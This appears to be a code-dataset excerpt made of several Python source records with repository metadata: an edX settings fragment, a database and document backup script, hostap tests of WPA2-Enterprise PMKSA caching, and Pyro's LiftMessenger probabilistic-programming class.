PASSWORD_MIN_LENGTH = ENV_TOKENS.get("PASSWORD_MIN_LENGTH")
PASSWORD_MAX_LENGTH = ENV_TOKENS.get("PASSWORD_MAX_LENGTH")
PASSWORD_COMPLEXITY = ENV_TOKENS.get("PASSWORD_COMPLEXITY", {})
PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD = ENV_TOKENS.get("PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD")
PASSWORD_DICTIONARY = ENV_TOKENS.get("PASSWORD_DICTIONARY", [])
### INACTIVITY SETTINGS ####
SESSION_INACTIVITY_TIMEOUT_IN_SECONDS = AUTH_TOKENS.get("SESSION_INACTIVITY_TIMEOUT_IN_SECONDS")
##### X-Frame-Options response header settings #####
X_FRAME_OPTIONS = ENV_TOKENS.get('X_FRAME_OPTIONS', X_FRAME_OPTIONS)
##### ADVANCED_SECURITY_CONFIG #####
ADVANCED_SECURITY_CONFIG = ENV_TOKENS.get('ADVANCED_SECURITY_CONFIG', {})
################ ADVANCED COMPONENT/PROBLEM TYPES ###############
ADVANCED_COMPONENT_TYPES = ENV_TOKENS.get('ADVANCED_COMPONENT_TYPES', ADVANCED_COMPONENT_TYPES)
ADVANCED_PROBLEM_TYPES = ENV_TOKENS.get('ADVANCED_PROBLEM_TYPES', ADVANCED_PROBLEM_TYPES)
DEPRECATED_ADVANCED_COMPONENT_TYPES = ENV_TOKENS.get(
'DEPRECATED_ADVANCED_COMPONENT_TYPES', DEPRECATED_ADVANCED_COMPONENT_TYPES
)
################ VIDEO UPLOAD PIPELINE ###############
VIDEO_UPLOAD_PIPELINE = ENV_TOKENS.get('VIDEO_UPLOAD_PIPELINE', VIDEO_UPLOAD_PIPELINE)
################ PUSH NOTIFICATIONS ###############
PARSE_KEYS = AUTH_TOKENS.get("PARSE_KEYS", {})
# Video Caching. Pairing country codes with CDN URLs.
# Example: {'CN': 'http://api.xuetangx.com/edx/video?s3_url='}
VIDEO_CDN_URL = ENV_TOKENS.get('VIDEO_CDN_URL', {})
if FEATURES['ENABLE_COURSEWARE_INDEX'] or FEATURES['ENABLE_LIBRARY_INDEX']:
# Use ElasticSearch for the search engine
SEARCH_ENGINE = "search.elastic.ElasticSearchEngine"
XBLOCK_SETTINGS = ENV_TOKENS.get('XBLOCK_SETTINGS', {})
XBLOCK_SETTINGS.setdefault("VideoDescriptor", {})["licensing_enabled"] = FEATURES.get("LICENSING", False)
XBLOCK_SETTINGS.setdefault("VideoModule", {})['YOUTUBE_API_KEY'] = AUTH_TOKENS.get('YOUTUBE_API_KEY', YOUTUBE_API_KEY)
################# PROCTORING CONFIGURATION ##################
PROCTORING_BACKEND_PROVIDER = AUTH_TOKENS.get("PROCTORING_BACKEND_PROVIDER", PROCTORING_BACKEND_PROVIDER)
PROCTORING_SETTINGS = ENV_TOKENS.get("PROCTORING_SETTINGS", PROCTORING_SETTINGS)
|
agpl-3.0
| -5,478,946,343,448,647,000 | 39.915301 | 120 | 0.71005 | false |
HSZemi/stre
|
backup/backup.py
|
1
|
2484
|
#! /usr/bin/env python3
import sys
sys.path.append('../')
import stre.settings
import datetime
import subprocess
host = stre.settings.DATABASES['default']['HOST']
user = stre.settings.DATABASES['default']['USER']
password = stre.settings.DATABASES['default']['PASSWORD']
name = stre.settings.DATABASES['default']['NAME']
gpg_target_id = stre.settings.GPG_TARGET_ID
basename = "{0.year:04d}{0.month:02d}{0.day:02d}_{0.hour:02d}{0.minute:02d}{0.second:02d}".format(datetime.datetime.now())
commands = {}
commands_cleanup= {}
commands['sql'] = "mysqldump --host={host} --user={user} --password={password} --databases {name} --result-file={basename}.sql".format(host=host, user=user, password=password, name=name, basename=basename)
commands['briefe_zip'] = "zip -r {basename}_briefe.zip ../dokumente/briefe/*".format(basename=basename)
commands['export_zip'] = "zip -r {basename}_export.zip ../dokumente/export/*".format(basename=basename)
commands['nachweise_zip'] = "zip -r {basename}_nachweise.zip ../dokumente/nachweise/*".format(basename=basename)
commands['bundle'] = "zip {basename}.zip {basename}.sql {basename}_briefe.zip {basename}_export.zip {basename}_nachweise.zip".format(basename=basename)
commands['encrypt'] = "gpg --output {basename}.zip.gpg --encrypt --recipient {gpg_target_id} {basename}.zip".format(basename=basename, gpg_target_id=gpg_target_id)
commands_cleanup['sql'] = "rm {basename}.sql".format(basename=basename)
commands_cleanup['briefe_zip'] = "rm {basename}_briefe.zip".format(basename=basename)
commands_cleanup['export_zip'] = "rm {basename}_export.zip".format(basename=basename)
commands_cleanup['nachweise_zip'] = "rm {basename}_nachweise.zip".format(basename=basename)
commands_cleanup['zip'] = "rm {basename}.zip".format(basename=basename)
print("Storing backup as {}.gpg".format(basename))
subprocess.run(commands['sql'], shell=True)
subprocess.run(commands['briefe_zip'], shell=True)
subprocess.run(commands['export_zip'], shell=True)
subprocess.run(commands['nachweise_zip'], shell=True)
subprocess.run(commands['bundle'], shell=True)
subprocess.run(commands['encrypt'], shell=True)
print("Removing temporary files")
subprocess.run(commands_cleanup['sql'], shell=True)
subprocess.run(commands_cleanup['briefe_zip'], shell=True)
subprocess.run(commands_cleanup['export_zip'], shell=True)
subprocess.run(commands_cleanup['nachweise_zip'], shell=True)
subprocess.run(commands_cleanup['zip'], shell=True)
print("Backup file created.")
|
gpl-3.0
| 6,190,831,153,205,049,000 | 44.163636 | 205 | 0.739533 | false |
aelarabawy/hostap
|
tests/hwsim/test_pmksa_cache.py
|
1
|
23504
|
# WPA2-Enterprise PMKSA caching tests
# Copyright (c) 2013-2014, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import logging
logger = logging.getLogger()
import subprocess
import time
import hostapd
from wpasupplicant import WpaSupplicant
from test_ap_eap import eap_connect
def test_pmksa_cache_on_roam_back(dev, apdev):
"""PMKSA cache to skip EAP on reassociation back to same AP"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
pmksa = dev[0].get_pmksa(bssid)
if pmksa is None:
raise Exception("No PMKSA cache entry created")
if pmksa['opportunistic'] != '0':
raise Exception("Unexpected opportunistic PMKSA cache entry")
hostapd.add_ap(apdev[1]['ifname'], params)
bssid2 = apdev[1]['bssid']
dev[0].dump_monitor()
logger.info("Roam to AP2")
# It can take some time for the second AP to become ready to reply to Probe
# Request frames especially under heavy CPU load, so allow couple of rounds
# of scanning to avoid reporting errors incorrectly just because of scans
# not having seen the target AP.
for i in range(0, 10):
dev[0].scan(freq="2412")
if dev[0].get_bss(bssid2) is not None:
break
logger.info("Scan again to find target AP")
dev[0].request("ROAM " + bssid2)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=10)
if ev is None:
raise Exception("EAP success timed out")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
pmksa2 = dev[0].get_pmksa(bssid2)
if pmksa2 is None:
raise Exception("No PMKSA cache entry found")
if pmksa2['opportunistic'] != '0':
raise Exception("Unexpected opportunistic PMKSA cache entry")
dev[0].dump_monitor()
logger.info("Roam back to AP1")
dev[0].scan(freq="2412")
dev[0].request("ROAM " + bssid)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa1b = dev[0].get_pmksa(bssid)
if pmksa1b is None:
raise Exception("No PMKSA cache entry found")
if pmksa['pmkid'] != pmksa1b['pmkid']:
raise Exception("Unexpected PMKID change for AP1")
dev[0].dump_monitor()
if "FAIL" in dev[0].request("PMKSA_FLUSH"):
raise Exception("PMKSA_FLUSH failed")
if dev[0].get_pmksa(bssid) is not None or dev[0].get_pmksa(bssid2) is not None:
raise Exception("PMKSA_FLUSH did not remove PMKSA entries")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=5)
if ev is None:
raise Exception("Disconnection event timed out")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=15)
if ev is None:
raise Exception("Reconnection timed out")
def test_pmksa_cache_opportunistic_only_on_sta(dev, apdev):
"""Opportunistic PMKSA caching enabled only on station"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef", okc=True,
scan_freq="2412")
pmksa = dev[0].get_pmksa(bssid)
if pmksa is None:
raise Exception("No PMKSA cache entry created")
if pmksa['opportunistic'] != '0':
raise Exception("Unexpected opportunistic PMKSA cache entry")
hostapd.add_ap(apdev[1]['ifname'], params)
bssid2 = apdev[1]['bssid']
dev[0].dump_monitor()
logger.info("Roam to AP2")
dev[0].scan(freq="2412")
dev[0].request("ROAM " + bssid2)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=10)
if ev is None:
raise Exception("EAP success timed out")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
pmksa2 = dev[0].get_pmksa(bssid2)
if pmksa2 is None:
raise Exception("No PMKSA cache entry found")
if pmksa2['opportunistic'] != '0':
raise Exception("Unexpected opportunistic PMKSA cache entry")
dev[0].dump_monitor()
logger.info("Roam back to AP1")
dev[0].scan(freq="2412")
dev[0].request("ROAM " + bssid)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa1b = dev[0].get_pmksa(bssid)
if pmksa1b is None:
raise Exception("No PMKSA cache entry found")
if pmksa['pmkid'] != pmksa1b['pmkid']:
raise Exception("Unexpected PMKID change for AP1")
def test_pmksa_cache_opportunistic(dev, apdev):
"""Opportunistic PMKSA caching"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
params['okc'] = "1"
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef", okc=True,
scan_freq="2412")
pmksa = dev[0].get_pmksa(bssid)
if pmksa is None:
raise Exception("No PMKSA cache entry created")
if pmksa['opportunistic'] != '0':
raise Exception("Unexpected opportunistic PMKSA cache entry")
hostapd.add_ap(apdev[1]['ifname'], params)
bssid2 = apdev[1]['bssid']
dev[0].dump_monitor()
logger.info("Roam to AP2")
dev[0].scan(freq="2412")
dev[0].request("ROAM " + bssid2)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa2 = dev[0].get_pmksa(bssid2)
if pmksa2 is None:
raise Exception("No PMKSA cache entry created")
dev[0].dump_monitor()
logger.info("Roam back to AP1")
dev[0].scan(freq="2412")
dev[0].request("ROAM " + bssid)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa1b = dev[0].get_pmksa(bssid)
if pmksa1b is None:
raise Exception("No PMKSA cache entry found")
if pmksa['pmkid'] != pmksa1b['pmkid']:
raise Exception("Unexpected PMKID change for AP1")
def test_pmksa_cache_opportunistic_connect(dev, apdev):
"""Opportunistic PMKSA caching with connect API"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
params['okc'] = "1"
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5", drv_params="force_connect_cmd=1")
wpas.connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef", okc=True,
scan_freq="2412")
pmksa = wpas.get_pmksa(bssid)
if pmksa is None:
raise Exception("No PMKSA cache entry created")
if pmksa['opportunistic'] != '0':
raise Exception("Unexpected opportunistic PMKSA cache entry")
hostapd.add_ap(apdev[1]['ifname'], params)
bssid2 = apdev[1]['bssid']
wpas.dump_monitor()
logger.info("Roam to AP2")
wpas.scan(freq="2412")
wpas.request("ROAM " + bssid2)
ev = wpas.wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa2 = wpas.get_pmksa(bssid2)
if pmksa2 is None:
raise Exception("No PMKSA cache entry created")
wpas.dump_monitor()
logger.info("Roam back to AP1")
wpas.scan(freq="2412")
wpas.request("ROAM " + bssid)
ev = wpas.wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa1b = wpas.get_pmksa(bssid)
if pmksa1b is None:
raise Exception("No PMKSA cache entry found")
if pmksa['pmkid'] != pmksa1b['pmkid']:
raise Exception("Unexpected PMKID change for AP1")
def test_pmksa_cache_expiration(dev, apdev):
"""PMKSA cache entry expiration"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].request("SET dot11RSNAConfigPMKLifetime 10")
dev[0].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
pmksa = dev[0].get_pmksa(bssid)
if pmksa is None:
raise Exception("No PMKSA cache entry created")
logger.info("Wait for PMKSA cache entry to expire")
ev = dev[0].wait_event(["WPA: Key negotiation completed",
"CTRL-EVENT-DISCONNECTED"], timeout=15)
if ev is None:
raise Exception("No EAP reauthentication seen")
if "CTRL-EVENT-DISCONNECTED" in ev:
raise Exception("Unexpected disconnection")
pmksa2 = dev[0].get_pmksa(bssid)
if pmksa['pmkid'] == pmksa2['pmkid']:
raise Exception("PMKID did not change")
def test_pmksa_cache_expiration_disconnect(dev, apdev):
"""PMKSA cache entry expiration (disconnect)"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].request("SET dot11RSNAConfigPMKLifetime 2")
dev[0].request("SET dot11RSNAConfigPMKReauthThreshold 100")
dev[0].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
pmksa = dev[0].get_pmksa(bssid)
if pmksa is None:
raise Exception("No PMKSA cache entry created")
hapd.request("SET auth_server_shared_secret incorrect")
logger.info("Wait for PMKSA cache entry to expire")
ev = dev[0].wait_event(["WPA: Key negotiation completed",
"CTRL-EVENT-DISCONNECTED"], timeout=15)
if ev is None:
raise Exception("No EAP reauthentication seen")
if "CTRL-EVENT-DISCONNECTED" not in ev:
raise Exception("Missing disconnection")
hapd.request("SET auth_server_shared_secret radius")
ev = dev[0].wait_event(["WPA: Key negotiation completed"], timeout=15)
if ev is None:
raise Exception("No EAP reauthentication seen")
pmksa2 = dev[0].get_pmksa(bssid)
if pmksa['pmkid'] == pmksa2['pmkid']:
raise Exception("PMKID did not change")
def test_pmksa_cache_and_cui(dev, apdev):
"""PMKSA cache and Chargeable-User-Identity"""
params = hostapd.wpa2_eap_params(ssid="cui")
params['radius_request_cui'] = '1'
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].connect("cui", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-cui",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
pmksa = dev[0].get_pmksa(bssid)
if pmksa is None:
raise Exception("No PMKSA cache entry created")
dev[0].dump_monitor()
logger.info("Disconnect and reconnect to the same AP")
dev[0].request("DISCONNECT")
dev[0].request("RECONNECT")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Reconnect timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa1b = dev[0].get_pmksa(bssid)
if pmksa1b is None:
raise Exception("No PMKSA cache entry found")
if pmksa['pmkid'] != pmksa1b['pmkid']:
raise Exception("Unexpected PMKID change for AP1")
dev[0].request("REAUTHENTICATE")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=10)
if ev is None:
raise Exception("EAP success timed out")
for i in range(0, 20):
state = dev[0].get_status_field("wpa_state")
if state == "COMPLETED":
break
time.sleep(0.1)
if state != "COMPLETED":
raise Exception("Reauthentication did not complete")
def test_pmksa_cache_preauth(dev, apdev):
"""RSN pre-authentication to generate PMKSA cache entry"""
try:
params = hostapd.wpa2_eap_params(ssid="test-wpa2-eap")
params['bridge'] = 'ap-br0'
hostapd.add_ap(apdev[0]['ifname'], params)
subprocess.call(['sudo', 'brctl', 'setfd', 'ap-br0', '0'])
subprocess.call(['sudo', 'ip', 'link', 'set', 'dev', 'ap-br0', 'up'])
eap_connect(dev[0], apdev[0], "PAX", "pax.user@example.com",
password_hex="0123456789abcdef0123456789abcdef")
params = hostapd.wpa2_eap_params(ssid="test-wpa2-eap")
params['bridge'] = 'ap-br0'
params['rsn_preauth'] = '1'
params['rsn_preauth_interfaces'] = 'ap-br0'
hostapd.add_ap(apdev[1]['ifname'], params)
bssid1 = apdev[1]['bssid']
dev[0].scan(freq="2412")
success = False
status_seen = False
for i in range(0, 50):
if not status_seen:
status = dev[0].request("STATUS")
if "Pre-authentication EAPOL state machines:" in status:
status_seen = True
time.sleep(0.1)
pmksa = dev[0].get_pmksa(bssid1)
if pmksa:
success = True
break
if not success:
raise Exception("No PMKSA cache entry created from pre-authentication")
if not status_seen:
raise Exception("Pre-authentication EAPOL status was not available")
dev[0].scan(freq="2412")
if "[WPA2-EAP-CCMP-preauth]" not in dev[0].request("SCAN_RESULTS"):
raise Exception("Scan results missing RSN element info")
dev[0].request("ROAM " + bssid1)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa2 = dev[0].get_pmksa(bssid1)
if pmksa2 is None:
raise Exception("No PMKSA cache entry")
if pmksa['pmkid'] != pmksa2['pmkid']:
raise Exception("Unexpected PMKID change")
finally:
subprocess.call(['sudo', 'ip', 'link', 'set', 'dev', 'ap-br0', 'down'])
subprocess.call(['sudo', 'brctl', 'delbr', 'ap-br0'])
def test_pmksa_cache_disabled(dev, apdev):
"""PMKSA cache disabling on AP"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
params['disable_pmksa_caching'] = '1'
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
hostapd.add_ap(apdev[1]['ifname'], params)
bssid2 = apdev[1]['bssid']
dev[0].dump_monitor()
logger.info("Roam to AP2")
dev[0].scan_for_bss(bssid2, freq="2412")
dev[0].request("ROAM " + bssid2)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=10)
if ev is None:
raise Exception("EAP success timed out")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
dev[0].dump_monitor()
logger.info("Roam back to AP1")
dev[0].scan(freq="2412")
dev[0].request("ROAM " + bssid)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=20)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("EAP exchange missing")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=20)
if ev is None:
raise Exception("Roaming with the AP timed out")
def test_pmksa_cache_ap_expiration(dev, apdev):
"""PMKSA cache entry expiring on AP"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-user-session-timeout",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
dev[0].request("DISCONNECT")
time.sleep(5)
dev[0].dump_monitor()
dev[0].request("RECONNECT")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=20)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("EAP exchange missing")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=20)
if ev is None:
raise Exception("Reassociation with the AP timed out")
dev[0].dump_monitor()
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=20)
if ev is None:
raise Exception("Disconnection event timed out")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=20)
if ev is None:
raise Exception("Reassociation with the AP timed out")
def test_pmksa_cache_multiple_sta(dev, apdev):
"""PMKSA cache with multiple stations"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
dev[0].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-user-session-timeout",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
dev[1].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
dev[2].connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-user-session-timeout",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5")
wpas.connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
hostapd.add_ap(apdev[1]['ifname'], params)
bssid2 = apdev[1]['bssid']
logger.info("Roam to AP2")
for sta in [ dev[1], dev[0], dev[2], wpas ]:
sta.dump_monitor()
sta.scan_for_bss(bssid2, freq="2412")
sta.request("ROAM " + bssid2)
ev = sta.wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=10)
if ev is None:
raise Exception("EAP success timed out")
ev = sta.wait_event(["CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
logger.info("Roam back to AP1")
for sta in [ dev[1], wpas, dev[0], dev[2] ]:
sta.dump_monitor()
sta.scan(freq="2412")
sta.dump_monitor()
sta.request("ROAM " + bssid)
ev = sta.wait_event(["CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
sta.dump_monitor()
time.sleep(4)
logger.info("Roam back to AP2")
for sta in [ dev[1], wpas, dev[0], dev[2] ]:
sta.dump_monitor()
sta.scan(freq="2412")
sta.dump_monitor()
sta.request("ROAM " + bssid2)
ev = sta.wait_event(["CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
sta.dump_monitor()
def test_pmksa_cache_opportunistic_multiple_sta(dev, apdev):
"""Opportunistic PMKSA caching with multiple stations"""
params = hostapd.wpa2_eap_params(ssid="test-pmksa-cache")
params['okc'] = "1"
hostapd.add_ap(apdev[0]['ifname'], params)
bssid = apdev[0]['bssid']
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
wpas.interface_add("wlan5")
for sta in [ dev[0], dev[1], dev[2], wpas ]:
sta.connect("test-pmksa-cache", proto="RSN", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef", okc=True,
scan_freq="2412")
hostapd.add_ap(apdev[1]['ifname'], params)
bssid2 = apdev[1]['bssid']
logger.info("Roam to AP2")
for sta in [ dev[2], dev[0], wpas, dev[1] ]:
sta.dump_monitor()
sta.scan_for_bss(bssid2, freq="2412")
sta.request("ROAM " + bssid2)
ev = sta.wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
pmksa2 = sta.get_pmksa(bssid2)
if pmksa2 is None:
raise Exception("No PMKSA cache entry created")
logger.info("Roam back to AP1")
for sta in [ dev[0], dev[1], dev[2], wpas ]:
sta.dump_monitor()
sta.scan_for_bss(bssid, freq="2412")
sta.request("ROAM " + bssid)
ev = sta.wait_event(["CTRL-EVENT-EAP-STARTED",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Roaming with the AP timed out")
if "CTRL-EVENT-EAP-STARTED" in ev:
raise Exception("Unexpected EAP exchange")
|
gpl-2.0
| 8,156,492,690,407,084,000 | 40.453263 | 83 | 0.60845 | false |
uber/pyro
|
pyro/poutine/lift_messenger.py
|
1
|
4853
|
# Copyright (c) 2017-2019 Uber Technologies, Inc.
# SPDX-License-Identifier: Apache-2.0
import warnings
from pyro import params
from pyro.distributions.distribution import Distribution
from pyro.poutine.util import is_validation_enabled
from .messenger import Messenger
class LiftMessenger(Messenger):
"""
Given a stochastic function with param calls and a prior distribution,
create a stochastic function where all param calls are replaced by sampling from prior.
Prior should be a callable or a dict of names to callables.
Consider the following Pyro program:
>>> def model(x):
... s = pyro.param("s", torch.tensor(0.5))
... z = pyro.sample("z", dist.Normal(x, s))
... return z ** 2
>>> lifted_model = pyro.poutine.lift(model, prior={"s": dist.Exponential(0.3)})
``lift`` makes ``param`` statements behave like ``sample`` statements
using the distributions in ``prior``. In this example, site `s` will now behave
as if it was replaced with ``s = pyro.sample("s", dist.Exponential(0.3))``:
>>> tr = pyro.poutine.trace(lifted_model).get_trace(0.0)
>>> tr.nodes["s"]["type"] == "sample"
True
>>> tr2 = pyro.poutine.trace(lifted_model).get_trace(0.0)
>>> bool((tr2.nodes["s"]["value"] == tr.nodes["s"]["value"]).all())
False
:param fn: function whose parameters will be lifted to random values
:param prior: prior function in the form of a Distribution or a dict of stochastic fns
:returns: ``fn`` decorated with a :class:`~pyro.poutine.lift_messenger.LiftMessenger`
"""
def __init__(self, prior):
"""
:param prior: prior used to lift parameters. Prior can be of type
dict, pyro.distributions, or a python stochastic fn
Constructor
"""
super().__init__()
self.prior = prior
self._samples_cache = {}
def __enter__(self):
self._samples_cache = {}
if is_validation_enabled() and isinstance(self.prior, dict):
self._param_hits = set()
self._param_misses = set()
return super().__enter__()
def __exit__(self, *args, **kwargs):
self._samples_cache = {}
if is_validation_enabled() and isinstance(self.prior, dict):
extra = set(self.prior) - self._param_hits
if extra:
warnings.warn(
"pyro.module prior did not find params ['{}']. "
"Did you instead mean one of ['{}']?"
.format("', '".join(extra), "', '".join(self._param_misses)))
return super().__exit__(*args, **kwargs)
def _pyro_sample(self, msg):
return None
def _pyro_param(self, msg):
"""
Overrides the `pyro.param` call with samples sampled from the
distribution specified in the prior. The prior can be a
pyro.distributions object or a dict of distributions keyed
on the param names. If the param name does not match the
name the keys in the prior, that param name is unchanged.
"""
name = msg["name"]
param_name = params.user_param_name(name)
if isinstance(self.prior, dict):
# prior is a dict of distributions
if param_name in self.prior.keys():
msg["fn"] = self.prior[param_name]
msg["args"] = msg["args"][1:]
if isinstance(msg['fn'], Distribution):
msg["args"] = ()
msg["kwargs"] = {}
msg["infer"] = {}
if is_validation_enabled():
self._param_hits.add(param_name)
else:
if is_validation_enabled():
self._param_misses.add(param_name)
return None
elif isinstance(self.prior, Distribution):
# prior is a distribution
msg["fn"] = self.prior
msg["args"] = ()
msg["kwargs"] = {}
msg["infer"] = {}
elif callable(self.prior):
if not isinstance(self.prior, Distribution):
# prior is a stochastic fn. block sample
msg["stop"] = True
msg["fn"] = self.prior
msg["args"] = msg["args"][1:]
else:
# otherwise leave as is
return None
msg["type"] = "sample"
if name in self._samples_cache:
# Multiple pyro.param statements with the same
# name. Block the site and fix the value.
msg['value'] = self._samples_cache[name]['value']
msg["is_observed"] = True
msg["stop"] = True
else:
self._samples_cache[name] = msg
